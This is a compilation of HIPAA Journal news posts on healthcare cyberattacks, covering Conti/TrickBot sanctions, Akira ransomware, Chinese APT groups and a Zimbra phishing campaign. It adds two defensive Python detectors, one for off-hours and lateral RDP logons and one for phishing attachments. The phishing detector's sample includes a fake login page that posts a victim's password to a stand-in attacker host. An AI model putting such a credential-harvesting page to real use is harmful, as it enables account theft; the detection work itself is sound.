Healthcare Cybersecurity

Russian National Indicted for Scripps Health Ransomware Attack; 11 TrickBot/Conti Actors Sanctioned

The indictments of multiple members of the TrickBot/Conti Ransomware groups have recently been unsealed and 11 members of these cybercriminal operations have been sanctioned by the United States and the United Kingdom.

A federal grand jury in the Southern District of California indicted Russian national Maksim Galochkin for his role in a cyberattack on Scripps Health in May 2021. Galochkin and his co-conspirators are alleged to have conducted more than 900 attacks worldwide using Conti ransomware, including the attack on Scripps Health. A federal grand jury in the Northern District of Ohio indicted Galochkin and co-conspirators Maksim Rudenskiy, Mikhail Mikhailovich Tsarev, Andrey Yuryevich Zhuykov, Dmitry Putilin, Sergey Loguntsov, Max Mikhaylov, Valentin Karyagin, and Maksim Khaliullin over the use of TrickBot malware to steal funds and confidential information from businesses and financial institutions in the United States since 2015. A federal grand jury in the Middle District of Tennessee returned an indictment charging Galochkin and co-conspirators Rudenskiy, Tsarev, and Zhuykov with conspiring to use Conti ransomware to attack businesses, nonprofits, and governments in the United States from 2020 until June 2022, when the Conti operation was disbanded.

Galochkin was also one of 11 individuals recently sanctioned by the U.S. Department of Justice, the Department of the Treasury’s Office of Foreign Assets Control (OFAC), and the United Kingdom for being part of the Russian TrickBot cybercrime group. TrickBot was first identified in 2016 and started life as a banking Trojan. The malware was developed from the Dyre Trojan and was used to attack and steal money from non-Russian businesses. The modular malware evolved over the years and new capabilities were added which allowed the TrickBot gang to conduct a range of malicious activities, including ransomware attacks. The group is believed to have extorted more than $180 million from victims around the world and conducted many attacks on hospitals and other healthcare providers in the United States. While the TrickBot gang is a cybercriminal group, members of the group are associated with the Russian intelligence services and have conducted attacks on the U.S. government and other U.S. targets in line with the objectives of the Russian intelligence services.

The 11 sanctioned individuals materially assisted with TrickBot operations and include administrators, managers, developers, and coders. Galochkin (aka Bentley, Crypt, Volhvb) is alleged to have led a group of testers and had responsibilities for the development, supervision, and implementation of tests. The other 10 sanctioned individuals are senior administrator Andrey Zhuykov (aka Dif, Defender); lead coder Maksim Rudenskiy; human resources and finance manager Mikhail Tsarev; infrastructure purchaser Dmitry Putilin (aka grad, staff); HR manager Maksim Khaliullin (aka Kagas); TrickBot developer Sergey Loguntsov; internal utilities group member Mikhail Chernov (aka Bullet); admin team member Alexander Mozhaev (aka Green and Rocco); and coders Vadym Valiakhmetov (aka Weldon, Mentos, Vasm) and Artem Kurov (aka Naned).

18 members of the TrickBot operation have now been sanctioned, with the latest 11 adding to the 7 members sanctioned by the United States and United Kingdom in February this year. The addition of these individuals to OFAC’s sanctions list means all property and interests in property of the individuals that are in the United States or in the possession or control of U.S. persons must be blocked and reported to OFAC. All dealings with these individuals by U.S. persons are prohibited, including paying ransoms. Individuals who engage in transactions with sanctioned individuals may themselves be exposed to OFAC designation, and any foreign financial institution that knowingly facilitates a significant transaction or provides significant financial services for any of the sanctioned individuals could be subject to U.S. correspondent or payable-through account sanctions.

All of the indicted and sanctioned individuals remain at large. That is likely to remain the case as they are believed to reside in Russia where there is no extradition treaty with the United States.

The post Russian National Indicted for Scripps Health Ransomware Attack; 11 TrickBot/Conti Actors Sanctioned appeared first on HIPAA Journal.

Akira Ransomware Group Targeting the Healthcare and Public Health Sector

The HHS’ Health Sector Cybersecurity Coordination Center (HC3) has issued a health and public health (HPH) sector alert about a new ransomware group called Akira, which has been in operation since March 2023. Akira is a ransomware-as-a-service (RaaS) group that recruits affiliates to conduct attacks in exchange for a percentage of the profits they generate. The group mostly attacks small- to medium-sized businesses, although it sets substantial ransom demands, typically between $200,000 and $4 million. The group has claimed at least 60 victims in a little over 5 months of operation, including organizations in the HPH sector.

The group engages in double extortion tactics, where valuable data are identified and exfiltrated before files are encrypted. The group issues a ransom demand, payment of which is required for the keys to decrypt files and to prevent the release of stolen data. Victims are required to contact the group via their TOR site to negotiate the ransom payment. Victims who pay the ransom are offered a security report that explains the vulnerabilities the group exploited to access their network.

The group uses a variety of methods for initial access, including compromised credentials and the exploitation of vulnerabilities in virtual private networks (VPNs), especially where multi-factor authentication has not been implemented. The group has Windows and Linux ransomware variants and targets both Windows and VMware ESXi servers. Incident response data show the group uses a variety of tools in its attacks, including the PCHunter toolkit, the MASSCAN port scanner, Mimikatz for credential harvesting, WinSCP, and PsExec.

The group is thought to have links to the disbanded Conti ransomware group, as Akira and Conti ransomware use similar code, cryptocurrency wallets, and directory exclusions. HC3 has shared Indicators of Compromise (IoCs) in the Akira ransomware sector alert and provides several recommended mitigations to help network defenders improve resilience to attacks and detect attacks in progress.

The post Akira Ransomware Group Targeting the Healthcare and Public Health Sector appeared first on HIPAA Journal.

78% of Healthcare Organizations Suffered a Cyberattack in the Past Year

A recent survey of healthcare professionals indicates 78% of healthcare organizations have experienced at least one cybersecurity incident in the past 12 months. 60% of those incidents had a moderate or significant impact on the delivery of care, 15% had a severe impact, and 30% involved sensitive data. Protected Health Information (PHI) was exposed or stolen in 34% of incidents in North America.

The survey was conducted by Pollfish on behalf of the cybersecurity firm Claroty on 1,100 individuals in North and South America, APAC, and Europe. Respondents worked full-time in the health sector in cybersecurity, engineering, IT, or networking. The survey indicates 26% of organizations that experienced a cyberattack paid a ransom to either prevent the release of stolen data or to decrypt encrypted files. The costs of these attacks typically fell in the range of $100,000 to $1 million; however, more than one-third of respondents who experienced a cyberattack said the recovery costs were greater than $1 million. The biggest cost from the attacks in all but the APAC region was operational downtime.

61% of respondents in North America said they were very or moderately concerned about cyberattacks on their systems. The biggest concerns in this region were insider threats (47%), followed by supply chain and privilege escalation attacks (41%), denial of service (DoS) attacks (39%), and ransomware attacks (38%). A majority of organizations (78%) said they have clear leadership in place for medical device security, which is most commonly the responsibility of IT security teams, and cybersecurity programs typically covered sensitive data such as PHI, EHRs, IT systems, endpoints, medical devices, and building management systems (BMS) such as elevators and HVAC equipment. When asked about security standards, regulations, and guidelines, the NIST and HITRUST Cybersecurity Frameworks were seen as the most important in North America, followed by HIPAA and 405(d).

The survey indicates that healthcare organizations have a clear understanding of the aspects of security that need to be improved. The biggest gaps in defenses were cited as medical device vulnerability patching, asset inventory management, and medical device network segmentation. 60% of respondents said their organization’s security posture has improved over the past 12 months and 51% said their security budgets had been increased in the past year; however, efforts to improve cybersecurity were being hampered by the global shortage of cybersecurity professionals. More than 70% of respondents said they were looking to hire additional cybersecurity staff members and 80% said finding qualified candidates was difficult.

“Security challenges in the healthcare sector continue to mount as the number and types of connected assets grow and the attack surface expands. Beyond the financial ramifications organizations in any sector can face in the wake of a successful attack, in healthcare the stakes are raised due to the patient outcomes at risk,” explained Claroty in the report. “With strong security leadership in place, well-rounded security programs implemented, and the adherence to guidelines and frameworks from regulatory bodies, healthcare organizations are on the right track to ensuring cyber and operational resilience. Recognizing there is more work to be done, they are also prioritizing investments in people, processes, and technologies to build resilience further and ensure compliance while delivering uninterrupted, quality care to their patients.”

The post 78% of Healthcare Organizations Suffered a Cyberattack in the Past Year appeared first on HIPAA Journal.

Study Reveals State of External Exposure Management

CyCognito has published its latest State of External Exposure Management Report, which highlights the extent to which vulnerabilities affect organizations and how easy it is for hackers to exploit those vulnerabilities.

For the report, CyCognito’s researchers aggregated and analyzed 3.5 million digital assets across its customer base between June 2022 and May 2023. The customer base includes small, medium, and large enterprises, including Fortune 500 companies.

The study found that 70% of web applications had severe security gaps, such as lacking web application firewall (WAF) protection and not using encrypted connections such as HTTPS, with 25% of web applications lacking both protections. A typical enterprise has more than 12,000 web apps such as APIs, SaaS applications, databases, and servers. The researchers found that at least 30% of those web apps (more than 3,000 assets) had at least one exploitable or high-risk vulnerability.

The study confirmed the extent to which personally identifiable information (PII) is put at risk. 74% of assets containing PII were found to be exposed to at least one major exploit, and one in ten assets had at least one easily exploitable issue. While critical severity vulnerabilities are a major concern, for every easily exploitable critical vulnerability identified, there were 133 easily exploitable high, medium, or low severity issues.

As CyCognito explains in the report, the attack surface is constantly changing, and its research suggests the attack surface fluctuates by as much as 10% each month. That means that over the course of a year, thousands of new assets may have been added to the network, and any one of those assets could contain an exploitable vulnerability. Because the attack surface is dynamic, organizations cannot make do with mapping it just once, as the map created will be out of date almost immediately.

Naturally, there is a balance to be struck, so many organizations have a biannual or quarterly mapping cadence, although such infrequent mapping could result in serious gaps in awareness and coverage. “To stay aware of risks as soon as they appear, use frequent mapping and scanning of all assets to maintain an up-to-date, comprehensive understanding of your external attack surface,” suggests CyCognito.

Attention needs to be paid to web apps, which typically account for around 22% of the attack surface. They are easy to deploy, provide access to valuable data, connect businesses with employees and customers, and can have dozens of components, each of which can be affected by security issues. Organizations should ensure that web apps are properly protected with WAF and encrypted connections, especially those that provide access to PII or e-commerce platforms.

Addressing security issues is a never-ending process. It is important to ensure that the most serious issues are prioritized and addressed first. CyCognito recommends using context about affected assets and threat actor activity to identify the most serious threats to prioritize and not to rely on CVSS scores, as there may be a far greater risk from less severe flaws, which threat actors can easily exploit.

The post Study Reveals State of External Exposure Management appeared first on HIPAA Journal.

Joint Commission Issues Guidance on Ensuring Patient Safety After a Cyberattack

The Joint Commission has issued a Sentinel Event Alert offering guidance on preserving patient safety following a cyberattack. Healthcare cyberattacks have been increasing in number and sophistication and it is no longer a case of if a healthcare organization will be attacked but when.

Cyberattacks can cause considerable disruption to healthcare operations and put patient care at risk, so it is critical that healthcare organizations do all they can to prevent cyberattacks, such as decreasing the attack surface, updating software and patching promptly, providing phishing awareness training, and implementing a range of cybersecurity solutions. Healthcare organizations must also plan for the worst-case scenario and must assume that their defenses will be breached. They must therefore have a tried and tested incident response plan that can be activated immediately in the event of a cyberattack.

When defenses are breached and unauthorized individuals have established a foothold in internal networks, a great deal of the recovery process will be handled by the IT department; however, all hospital staff members must be prepared to operate during such an emergency and must be included in the incident response planning process. A good starting point is the hazards vulnerability analysis (HVA), which is required by the Joint Commission. The HVA must cover human-related hazards, which include cyberattacks. The HVA helps hospitals identify and implement mitigation and preparedness actions to reduce the disruption of services and functions and ensure patient safety in the event of an attack. The Joint Commission also requires a continuity of operations plan, a disaster recovery plan, and an emergency management education and training program, all of which must be evaluated annually.

The Sentinel Event Alert provides recommendations on these processes specific to cyberattacks:

  • Evaluate HVA findings and prioritize hospital services that must remain operational and safe during extended downtime.
  • Form a downtime planning committee to develop preparedness actions and mitigations. The planning committee should include representation from all stakeholders.
  • Develop downtime plans, procedures, and resources and ensure they are regularly updated.
  • Designate response teams – An interdisciplinary team should be created that can be mobilized following a cyberattack.
  • Train team leaders, teams, and all staff on operating procedures during downtimes. Develop drills and exercises to ensure staff members are familiar with downtime resources.
  • Establish situational awareness with effective communication throughout the organization and with patients and families.
  • Following a cyberattack, regroup, evaluate, and make necessary improvements to the incident response plan and improve protections for systems to address the specific failures that allowed the attack to succeed.

“Cyberattacks cause a variety of care disruptions – leading to patient harm and severe financial repercussions,” said David W. Baker, MD, MPH, FACP, the Joint Commission’s executive vice president for healthcare quality evaluation and improvement. “Taking action now can help prepare healthcare organizations to deliver safe patient care in the event of future cyberattacks. The recommendations in the Sentinel Event Alert, as well as The Joint Commission’s related requirements on establishing and following a continuity of operations plan, disaster recovery plan and more, can help healthcare organizations successfully respond to a cyber emergency.”

The post Joint Commission Issues Guidance on Ensuring Patient Safety After a Cyberattack appeared first on HIPAA Journal.

Ransomware Groups are Accelerating Their Attacks with Dwell Time Falling to Just 5 Days

Ransomware groups have accelerated their attacks and are now spending less time inside victims’ networks before triggering file encryption, according to the 2023 Active Adversary Report from Sophos. The data for the report came from the first 6 months of 2023 and was gathered and analyzed by the Sophos X-Ops team.

The median dwell time for ransomware groups fell from 9 days to 5 days in the first half of 2023, which the researchers believe is close to the limit of what is possible for hackers. They do not expect the median dwell time to fall below 5 days due to the time it typically takes for the hackers to achieve their objectives. On average, it took 16 hours from initial access for attackers to gain access to Microsoft Active Directory and escalate privileges to allow broad access to internal systems. The majority of ransomware groups do not rely on encryption alone and also exfiltrate data so they can apply pressure to get victims to pay up. Oftentimes, backups of data exist so recovery is possible without paying the ransom, but if there is a threat of data exposure, ransoms are often paid. On average, it takes around 2 days for ransomware gangs to exfiltrate data.

The reduction in dwell time is understandable. The longer hackers remain in networks, the greater the probability that their presence will be detected, especially since intrusion detection systems are getting better at detecting intrusions and malicious activity. One of the ways ransomware groups have accelerated their attacks is by opting for intermittent encryption, where only parts of files are encrypted. The encryption process is far quicker, which means there is less time to detect and stop an attack in progress, but the encryption is still sufficient to prevent access to files.

Ransomware gangs often time their attacks to reduce the risk of detection. In 81% of attacks analyzed by the researchers, the encryption process was triggered outside normal business hours such as at the weekend or during holidays when staffing levels are lower. 43% of ransomware attacks were detected on a Friday or Saturday. While the dwell time for ransomware actors has reduced, there was a slight increase in the dwell time for non-ransomware incidents, which increased from an average of 11 days to 13 days in H1 2023.

In many cyberattacks, a vulnerability was exploited that allowed hackers to use a remote service for initial access, such as vulnerabilities in firewalls or VPN gateways. The exploitation of vulnerabilities in public-facing applications had been the leading root cause of attacks for some time, followed by external remote services; however, in H1 2023 this ordering was reversed: compromised credentials were the root cause in 50% of attacks, with vulnerability exploitation the root cause of 23% of attacks.

Compromised credentials make attacks easy for hackers especially when there is no multi-factor authentication. Implementing and enforcing phishing-resistant MFA should be a priority for all organizations, but the researchers found that in 39% of cases investigated, MFA was not configured. Prompt patching should also be a goal as this reduces the window of opportunity for hackers. The researchers suggest following CISA’s timeline for patching in its Binding Operational Directive 19-02 of 15 days for critical vulnerabilities and 30 days for high-severity vulnerabilities as it will force attackers into a narrower set of techniques by removing the low-hanging fruit.

Previous reports have highlighted the extent to which Remote Desktop Protocol (RDP) is abused. In H1 2023, RDP was used in 95% of attacks, up from 88% in 2022. In 77% of attacks involving RDP, the tool was used for internal access and lateral movement, up from 65% in 2022. Only 1% of attacks involved RDP for external access. Due to the extent to which RDP is abused, securing RDP should be a priority for security teams. If attackers are forced to break MFA or import their own tools for lateral movement, they will have to expend more time and effort, which gives defenders more time to detect intrusions and increases the probability of malicious activity being detected.
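Two of the report's findings translate directly into detection logic: encryption is usually triggered outside business hours, and RDP is mostly used for internal lateral movement rather than external access. The following is an added example (not Sophos' code or tooling) that flags RDP logons on a weekend or outside an assumed 08:00-18:00 UTC business window, and flags one source host and account reaching several distinct targets over RDP within a short window. The records are constructed, simplified from the fields of Windows Security event 4624 (logon type 10 is RemoteInteractive, i.e. RDP); the CSV layout, the business-hours window and the thresholds are assumptions for this example.

```python
"""Flag off-hours RDP logons and RDP fan-out across hosts in constructed
Windows Security event records. Added example; not Sophos' code."""
from collections import defaultdict
from datetime import datetime, time, timedelta

# Constructed sample records (not real telemetry), simplified from the fields
# of Windows Security event 4624. Logon type 10 = RemoteInteractive (RDP).
# Columns: timestamp_utc,event_id,logon_type,source_host,source_ip,target_host,account
# 2023-06-10 is a Saturday; 2023-06-07 and 2023-06-08 are weekdays.
SAMPLE_LOG = """\
2023-06-07T10:15:02Z,4624,10,ADMIN-WS,10.0.1.20,SRV-FILE01,jdoe
2023-06-10T02:14:05Z,4624,10,WS-0042,10.0.5.13,SRV-DC01,svc-backup
2023-06-10T02:21:40Z,4624,10,WS-0042,10.0.5.13,SRV-FILE01,svc-backup
2023-06-10T02:33:12Z,4624,10,WS-0042,10.0.5.13,SRV-HIS02,svc-backup
2023-06-08T14:02:00Z,4624,3,WS-0042,10.0.5.13,SRV-FILE01,asmith
"""

# Assumed business window (UTC) for this example; tune per site and timezone.
BUSINESS_START = time(8, 0)
BUSINESS_END = time(18, 0)
RDP_LOGON_TYPE = "10"


def parse_events(text):
    """Parse the CSV export into dicts; blank or malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        parts = line.strip().split(",")
        if len(parts) != 7:
            continue
        ts, event_id, logon_type, src_host, src_ip, dst_host, account = parts
        events.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "event_id": event_id,
            "logon_type": logon_type,
            "src_host": src_host,
            "src_ip": src_ip,
            "dst_host": dst_host,
            "account": account,
        })
    return events


def is_off_hours(dt):
    """True on Saturday/Sunday or outside the assumed business-hours window."""
    if dt.weekday() >= 5:  # Monday=0 ... Saturday=5, Sunday=6
        return True
    return not (BUSINESS_START <= dt.time() < BUSINESS_END)


def find_rdp_anomalies(events, window=timedelta(hours=1), min_targets=3):
    """Return RDP logons that are off-hours, and (source host, account) pairs
    that reached at least min_targets distinct hosts within one window."""
    rdp = [e for e in events
           if e["event_id"] == "4624" and e["logon_type"] == RDP_LOGON_TYPE]
    off_hours = [e for e in rdp if is_off_hours(e["time"])]

    fan_out = []
    by_origin = defaultdict(list)
    for e in rdp:
        by_origin[(e["src_host"], e["account"])].append(e)
    for (src, account), evs in by_origin.items():
        evs.sort(key=lambda e: e["time"])
        for i, current in enumerate(evs):
            # Events from the same origin that fall inside the trailing window.
            recent = [x for x in evs[: i + 1] if current["time"] - x["time"] <= window]
            targets = {x["dst_host"] for x in recent}
            if len(targets) >= min_targets:
                fan_out.append({
                    "src_host": src,
                    "account": account,
                    "targets": targets,
                    "first_seen": recent[0]["time"],
                    "last_seen": current["time"],
                })
                break  # one finding per origin is enough for triage
    return {"off_hours": off_hours, "fan_out": fan_out}


if __name__ == "__main__":
    result = find_rdp_anomalies(parse_events(SAMPLE_LOG))
    for e in result["off_hours"]:
        print(f"off-hours RDP: {e['time']} {e['account']}@{e['src_host']} -> {e['dst_host']}")
    for f in result["fan_out"]:
        print(f"RDP fan-out: {f['account']}@{f['src_host']} -> {sorted(f['targets'])} "
              f"between {f['first_seen']} and {f['last_seen']}")
```

On the sample, the three Saturday logons from WS-0042 are reported as off-hours, and the same origin is reported once for reaching three servers inside an hour; the weekday administrator logon and the non-RDP (type 3) logon are not flagged. In a real deployment the thresholds need a baseline of legitimate administrative RDP use, otherwise the fan-out rule will fire on help-desk staff.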

The post Ransomware Groups are Accelerating Their Attacks with Dwell Time Falling to Just 5 Days appeared first on HIPAA Journal.

Know Your Adversary: HC3 Shares Details of Chinese APT Groups Targeting the Healthcare Sector

The healthcare industry is actively targeted by financially motivated cybercriminal gangs; however, state-sponsored hacking groups also seek access to healthcare networks and are actively targeting healthcare providers and other entities in the healthcare and public health sector.

In a recently published security advisory, the Health Sector Cybersecurity Coordination Center (HC3) provides a threat profile of some of the most capable Chinese hacking groups that are known to target U.S. healthcare organizations. While at least one Chinese state-sponsored hacking group is known to conduct cyberattacks for financial gain, most groups conduct attacks for espionage purposes and to obtain intellectual property (IP) of interest to the government of the People’s Republic of China, such as IP related to medical technology and medicine. For instance, Chinese hackers targeted pharmaceutical firms during the pandemic seeking COVID-19 vaccine research data.

One of the most active threat groups is known as APT41 (also BARIUM, Winnti, LEAD, WICKED SPIDER, WICKED PANDA, Blackfly, Suckfly, Winnti Umbrella, and Double Dragon). The group has been active since at least 2007 and is known to target U.S. healthcare organizations, most commonly with the goal of obtaining intellectual property to pass to the Chinese government, which operationalizes the technology to bring it to market. The group also engages in espionage and digital extortion and is known to conduct financially motivated cyberattacks, although those operations may be for personal gain rather than at the request of the Chinese government. APT41 aggressively exploits known vulnerabilities, often within hours after public disclosure, as was the case with the ProxyLogon and Log4J vulnerabilities. Once initial access has been gained, the group moves laterally within networks and establishes persistent access, often remaining in networks undetected for long periods while data of interest is exfiltrated. The group has an extensive arsenal of malware and uses well-known security tools in its attacks, such as a customized version of Cobalt Strike, Acunetix, Nmap, JexBoss, and Sqlmap.

APT10 (also known as Menupass Team, Stone Panda, Red Apollo, Cicada, CVNX, HOGFISH, and Cloud Hopper) engages in cyberespionage and cyberwarfare activities and has a focus on military and intelligence data. The group is known to leverage zero-day vulnerabilities to gain access to the networks of targets of interest and uses a variety of custom and public tools to achieve its aims. APT10 conducts highly targeted attacks, with initial access often achieved through spear phishing. The group is also known to target managed service providers (MSPs) in order to attack their downstream clients. The group often engages in living-off-the-land tactics, using tools already installed in victims’ environments.

APT18 (also known as Wekby, TA-428, TG-0416, Scandium, and Dynamite Panda) is a little-known APT group that is believed to work closely with the Chinese military and often targets human rights groups, governments, and a range of sectors, including pharmaceutical and biotechnology firms. The group is known to develop its own zero-day exploits, as well as adapt the exploits of others to meet its operational needs, and uses sophisticated malware such as Gh0st RAT, HTTPBrowser, pisloader, and PoisonIvy. APT18 is believed to be behind a 2014 attack on a healthcare provider in which the data of 4.5 million patients was stolen. The group is thought to have exploited the OpenSSL Heartbleed vulnerability to gain access to the network.

APT22 (also known as Barista, Group 46, and Suckfly) appears to be focused on targeting political entities and the healthcare sector, especially biomedical and pharmaceutical firms. The group is known to identify vulnerable public-facing web servers on victim networks and upload web shells, and uses complex malware such as PISCES, SOGU, FLATNOTE, ANGRYBELL, BASELESS, SEAWOLF, and LOGJAM.

In addition to outlining some of the tactics, techniques, and procedures used by each group, HC3 has shared mitigations to improve security against the most commonly used infection vectors.

The post Know Your Adversary: HC3 Shares Details of Chinese APT Groups Targeting the Healthcare Sector appeared first on HIPAA Journal.

Digital Health Security Initiative Launched by the HHS

The U.S. Department of Health and Human Services’ Advanced Research Projects Agency for Health (ARPA-H) has announced the launch of the Digital Health Security (DIGIHEALS) project which seeks to improve the electronic infrastructure of the U.S. healthcare industry. ARPA-H is a funding agency that was created in 2022 to support biomedical and health research, specifically research that has the potential to advance aspects of medicine and health that cannot be achieved through more traditional research and commercial activity.

Over the past few years, cybercriminals have been targeting the healthcare sector and have been using ransomware to prevent access to critical systems and data. In many attacks, hospitals have been forced to divert ambulances, cancel appointments, and delay care. Many attacks have caused disruption for months and some attacks have resulted in the permanent closure of healthcare facilities.

“The DIGIHEALS project comes when the U.S. healthcare system urgently requires rigorous cybersecurity capabilities to protect patient privacy, safety, and lives,” said ARPA-H Director Dr. Renee Wegrzyn. “Currently, off-the-shelf software tools fall short in detecting emerging cyber threats and protecting our medical facilities, resulting in a technical gap we seek to bridge with this initiative.”

The project aims to reduce the ability of malicious actors to attack digital systems and prevent large-scale cyberattacks and will focus on cutting-edge security protocols, vulnerability detection, and automatic patching to address cybersecurity vulnerabilities and software-related weaknesses.

“By adapting and extending security, usability, and software assurance technologies, this digital health security effort will play a crucial role in addressing vulnerabilities in health systems,” said ARPA-H Program Manager Andrew Carney. “This project will also help us identify technical limitations of future technology deployments and contribute to the development of new innovations in digital security to better keep our health systems and patients’ information secure.”

Through a Broad Agency Announcement, the DIGIHEALS project is soliciting proposals for proven technologies developed for national security and will apply them to civilian health systems, clinical care facilities, and personal health devices to ensure that in the event of a widespread cyberattack, patients will be able to continue to receive the care they need. Proposals should be submitted through the Scaling Health Applications Research for Everyone (SHARE) BAA. ARPA-H anticipates issuing multiple awards.

The post Digital Health Security Initiative Launched by the HHS appeared first on HIPAA Journal.

Largescale Phishing Campaign Targets Zimbra Collaboration Email Servers

Researchers at ESET have identified a large-scale and ongoing phishing campaign targeting Zimbra Collaboration email servers at small- and medium-sized businesses and government agencies. The campaign has been active since at least April and is being conducted globally, with Poland, Ecuador, and Italy the most targeted countries. The campaign does not appear to be targeted at any specific vertical.

Targets are sent an email with an HTML attachment. The email warns the user about an email server update or another Zimbra issue, such as a security update. The From field indicates the email has been sent by an email server administrator. The user is told that they need to download the HTML attachment, which will have a URL pointing to a local file path. The HTML attachment includes the targeted organization’s logo, the organization’s name, and a fake login page, with the username prefilled. The user is only required to enter their password. If the password is entered, the credentials are transmitted by HTTPS POST request to an adversary-controlled server.

The ESET researchers observed waves of phishing emails being transmitted from some of the organizations targeted in the campaign which suggests the threat actor obtained administrator credentials and was able to set up new mailboxes on the server. The researchers suggest that in these cases, the same password may have been used for email and administration. While this email campaign is not particularly sophisticated, it has proven to be effective. Since the HTML attachments contain legitimate code and only one link pointing to a malicious host, which is contained in the HTML rather than the message body, the emails may not be detected as malicious and are likely to bypass antispam policies, especially since the targeted organizations are mostly small- to medium-sized businesses that are unlikely to have advanced email security defenses. ESET was unable to determine which threat actor is behind the campaign.
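The traits described above (an HTML attachment carrying a login form, a prefilled username, a password-only prompt, and a form action posting to a host outside the organisation) are all visible in the attachment's markup, so a mail gateway or analyst can triage them before delivery. The following is an added example, not code from ESET or the Zimbra project, that parses an HTML attachment with the standard library and reports each login form together with whether it posts to a host outside the organisation's own domains. The sample attachment, the organisation name and every domain in it are constructed.

```python
"""Triage an HTML email attachment for credential-harvesting login forms.
Added example; not ESET's or Zimbra's code. Sample inputs are constructed."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class LoginFormParser(HTMLParser):
    """Collect every <form>, noting password inputs and prefilled text inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # valueless attributes come back as None
        if tag == "form":
            self._form = {
                "action": a.get("action", ""),
                "method": a.get("method", "get").lower(),
                "password_field": False,
                "prefilled": [],
            }
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            itype = a.get("type", "text").lower()
            if itype == "password":
                self._form["password_field"] = True
            elif itype in ("text", "email") and a.get("value"):
                # A username already filled in is the lure's personalisation.
                self._form["prefilled"].append((a.get("name", ""), a["value"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def _is_trusted(host, trusted_domains):
    """True if host is one of the organisation's domains or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def triage_attachment(html, trusted_domains):
    """Return one finding per form that asks for a password. A form posting to a
    host outside trusted_domains is rated high; any other login form in an
    attachment is still worth a review."""
    parser = LoginFormParser()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not form["password_field"]:
            continue
        host = (urlparse(form["action"]).hostname or "").lower()
        external = bool(host) and not _is_trusted(host, trusted_domains)
        findings.append({
            "action": form["action"],
            "host": host,
            "method": form["method"],
            "prefilled": form["prefilled"],
            "external": external,
            "risk": "high" if external else "review",
        })
    return findings


# Constructed attachment with the described traits: branded page, prefilled
# username, password-only prompt, and a form that posts to an outside host.
SUSPICIOUS_ATTACHMENT = """
<html><body>
<img src="logo.png" alt="Example Health"><h2>Example Health Mail</h2>
<p>A mail server update is pending. Confirm your password to continue.</p>
<form method="post" action="https://collector.attacker.invalid/submit">
  <input type="text" name="user" value="j.doe@example-health.org">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
</body></html>
"""

# Constructed counterpart whose form posts to the organisation's own webmail host.
BENIGN_ATTACHMENT = SUSPICIOUS_ATTACHMENT.replace(
    "https://collector.attacker.invalid/submit", "https://mail.example-health.org/")

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_ATTACHMENT), ("benign", BENIGN_ATTACHMENT)):
        for f in triage_attachment(doc, ["example-health.org"]):
            print(f"{label}: risk={f['risk']} method={f['method']} host={f['host']!r} "
                  f"prefilled={f['prefilled']}")
```

The check deliberately keys on the form's destination host rather than on the text of the lure, because the page text and logo are copied from the victim organisation and look legitimate; the destination is the one element the attacker cannot borrow. A relative or empty action is reported as "review" rather than "high", since an attachment opened from disk has no origin to post to and the form would be inert.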

The post Largescale Phishing Campaign Targets Zimbra Collaboration Email Servers appeared first on HIPAA Journal.